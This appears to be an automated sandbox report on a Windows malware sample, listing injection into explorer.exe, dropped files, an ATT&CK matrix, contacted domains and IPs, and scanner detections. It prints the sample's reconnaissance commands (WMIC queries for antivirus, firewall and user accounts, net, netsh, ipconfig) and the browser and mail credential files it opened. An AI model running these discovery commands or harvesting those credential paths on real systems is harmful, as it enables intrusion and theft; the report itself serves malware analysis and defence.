                  Source: C:\Users\user\AppData\Roaming\vejhhuhThread created: unknown EIP: 1421970Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: PID: 6916 base: E379C0 value: 90Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: PID: 4900 base: 7FF72B812D10 value: 90Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: PID: 2176 base: E379C0 value: 90Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: PID: 5368 base: 7FF72B812D10 value: 90Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: PID: 3588 base: E379C0 value: 90Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: PID: 5268 base: 7FF72B812D10 value: 90Jump to behavior
                  Source: C:\Users\user\Desktop\v173TV3V11.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\Desktop\v173TV3V11.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vejhhuhSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vejhhuhSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: E379C0Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: E379C0Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: E379C0Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe19_2_00551016
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe19_2_005510A5
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csvJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csvJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csvJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydnsJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route printJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show stateJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csvJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net accounts /domainJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net shareJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net userJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csvJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 accounts /domain
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 share
                  Source: C:\Windows\System32\net.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv Jump to behavior
                  Source: explorer.exe, 00000001.00000000.1763817484.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1761929514.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1760942805.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000001.00000000.1760942805.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 00000001.00000000.1760642789.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
                  Source: explorer.exe, 00000001.00000000.1760942805.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: explorer.exe, 00000001.00000000.1760942805.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_008555EB cpuid 11_2_008555EB
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_00419FC0 GetVolumeInformationA,InterlockedCompareExchange,GetFocus,ReadConsoleW,FindAtomW,SetConsoleMode,GetDefaultCommConfigA,CopyFileW,CreatePipe,GetEnvironmentStrings,WriteConsoleOutputA,GetModuleFileNameA,GetSystemTimeAdjustment,ObjectPrivilegeAuditAlarmA,WaitForSingleObject,SetCommState,GetConsoleAliasesLengthW,GetComputerNameA,CopyFileW,GetFileAttributesA,GetConsoleAliasExesLengthA,GetBinaryType,FormatMessageA,GetLongPathNameA,GetCommTimeouts,LoadLibraryA,MoveFileA,InterlockedCompareExchange,0_2_00419FC0
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00802198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,11_2_00802198
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                  Source: 451E.exe, 00000009.00000003.2927136148.000002E002E34000.00000004.00000020.00020000.00000000.sdmp, 451E.exe, 00000009.00000003.2927592890.000002E002E41000.00000004.00000020.00020000.00000000.sdmp, 451E.exe, 00000009.00000003.2654320781.000002E002E34000.00000004.00000020.00020000.00000000.sdmp, 451E.exe, 00000009.00000003.3322030879.000002E002E3B000.00000004.00000020.00020000.00000000.sdmp, 451E.exe, 00000009.00000003.3322167908.000002E002E41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM FirewallProduct
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiSpywareProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 00000011.00000002.4175265628.0000000000F61000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2176, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5368, type: MEMORYSTR
                  Source: Yara matchFile source: 6.2.C35.exe.6b0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.C35.exe.6c0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.C35.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vejhhuh.670e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vejhhuh.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.3.vejhhuh.6d0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2024427682.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2024380318.0000000002070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.2264399369.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2315604310.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1780526952.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1780608383.0000000000801000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2561731311.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2561826979.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000003.2510328595.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2315554860.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 00000011.00000002.4175265628.0000000000F61000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2176, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5368, type: MEMORYSTR
                  Source: Yara matchFile source: 6.2.C35.exe.6b0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.C35.exe.6c0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.C35.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vejhhuh.670e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vejhhuh.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.3.vejhhuh.6d0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2024427682.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2024380318.0000000002070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.2264399369.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2315604310.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1780526952.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1780608383.0000000000801000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2561731311.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2561826979.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000003.2510328595.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2315554860.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  2
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  11
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  3
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  Data Encrypted for Impact
                  CredentialsDomainsDefault Accounts11
                  Native API
                  Boot or Logon Initialization Scripts522
                  Process Injection
                  1
                  Deobfuscate/Decode Files or Information
                  11
                  Input Capture
                  3
                  File and Directory Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  21
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Exploitation for Client Execution
                  Logon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information
                  1
                  Credentials in Registry
                  249
                  System Information Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  4
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  Command and Scripting Interpreter
                  Login HookLogin Hook12
                  Software Packing
                  NTDS1
                  Query Registry
                  Distributed Component Object Model11
                  Input Capture
                  115
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading
                  LSA Secrets781
                  Security Software Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  File Deletion
                  Cached Domain Credentials34
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Masquerading
                  DCSync4
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job34
                  Virtualization/Sandbox Evasion
                  Proc Filesystem1
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt522
                  Process Injection
                  /etc/passwd and /etc/shadow1
                  System Network Configuration Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Hidden Files and Directories
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524644 Sample: v173TV3V11.exe Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 58 nwgrus.ru 2->58 60 globalviewsnature.com 2->60 62 calvinandhalls.com 2->62 76 Multi AV Scanner detection for domain / URL 2->76 78 Suricata IDS alerts for network traffic 2->78 80 Found malware configuration 2->80 82 6 other signatures 2->82 11 v173TV3V11.exe 2->11         started        14 bsjhhuh 2->14         started        16 vejhhuh 2->16         started        18 msiexec.exe 2->18         started        signatures3 process4 signatures5 124 Detected unpacking (changes PE section rights) 11->124 126 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 11->126 128 Maps a DLL or memory area into another process 11->128 20 explorer.exe 64 9 11->20 injected 130 Antivirus detection for dropped file 14->130 132 Multi AV Scanner detection for dropped file 14->132 134 Machine Learning detection for dropped file 14->134 136 Checks if the current machine is a virtual machine (disk enumeration) 16->136 138 Creates a thread in another existing process (thread injection) 16->138 140 Switches to a custom stack to bypass stack traces 16->140 process6 dnsIp7 64 201.212.52.197, 49792, 49794, 49796 TelecomArgentinaSAAR Argentina 20->64 66 calvinandhalls.com 23.145.40.162, 443, 49768, 49769 SURFAIRWIRELESS-IN-01US Reserved 20->66 68 2 other IPs or domains 20->68 50 C:\Users\user\AppData\Roaming\vejhhuh, PE32 20->50 dropped 52 C:\Users\user\AppData\Roaming\bsjhhuh, PE32 20->52 dropped 54 C:\Users\user\AppData\Local\Temp\C35.exe, PE32 20->54 dropped 56 2 other malicious files 20->56 dropped 90 System process connects to network (likely due to code injection or exploit) 20->90 92 Benign windows process drops PE files 20->92 94 Injects code into the Windows Explorer (explorer.exe) 20->94 96 3 other signatures 20->96 25 451E.exe 14 20->25         started        28 C35.exe 20->28         started        30 explorer.exe 18 20->30         started        32 5 other processes 20->32 file8 signatures9 process10 signatures11 98 Multi AV Scanner detection for dropped file 25->98 100 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 25->100 102 Machine Learning detection for dropped file 25->102 120 2 other signatures 25->120 34 cmd.exe 1 25->34         started        104 Antivirus detection for dropped file 28->104 106 Detected unpacking (changes PE section rights) 28->106 108 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 28->108 122 4 other signatures 28->122 110 System process connects to network (likely due to code injection or exploit) 30->110 112 Found evasive API chain (may stop execution after checking mutex) 30->112 114 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 30->114 116 Tries to steal Mail credentials (via file / registry access) 30->116 118 Tries to harvest and steal browser information (history, passwords, etc) 32->118 process12 signatures13 70 Uses netsh to modify the Windows network and firewall settings 34->70 72 Uses ipconfig to lookup or modify the Windows network settings 34->72 74 Modifies the windows firewall 34->74 37 WMIC.exe 1 34->37         started        40 systeminfo.exe 34->40         started        42 net.exe 34->42         started        44 20 other processes 34->44 process14 signatures15 84 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 37->84 86 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 37->86 88 Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes) 37->88 46 net1.exe 42->46         started        48 net1.exe 44->48         started        process16

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  v173TV3V11.exe100%AviraHEUR/AGEN.1312571
                  v173TV3V11.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\C35.exe100%AviraHEUR/AGEN.1312571
                  C:\Users\user\AppData\Roaming\bsjhhuh100%AviraHEUR/AGEN.1312571
                  C:\Users\user\AppData\Roaming\vejhhuh100%AviraHEUR/AGEN.1312571
                  C:\Users\user\AppData\Local\Temp\451E.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\C35.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\bsjhhuh100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\vejhhuh100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\451E.exe37%ReversingLabsWin64.Trojan.Generic
                  C:\Users\user\AppData\Roaming\bsjhhuh29%ReversingLabs
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  calvinandhalls.com5%VirustotalBrowse
                  bg.microsoft.map.fastly.net0%VirustotalBrowse
                  nwgrus.ru12%VirustotalBrowse
                  fp2e7a.wpc.phicdn.net0%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                  https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
                  https://powerpoint.office.comcember0%URL Reputationsafe
                  https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  https://excel.office.com0%URL Reputationsafe
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                  http://schemas.micro0%URL Reputationsafe
                  https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
                  https://word.office.com0%URL Reputationsafe
                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                  https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  https://android.notify.windows.com/iOS0%URL Reputationsafe
                  https://api.msn.com/0%URL Reputationsafe
                  https://support.mozilla.org0%URL Reputationsafe
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
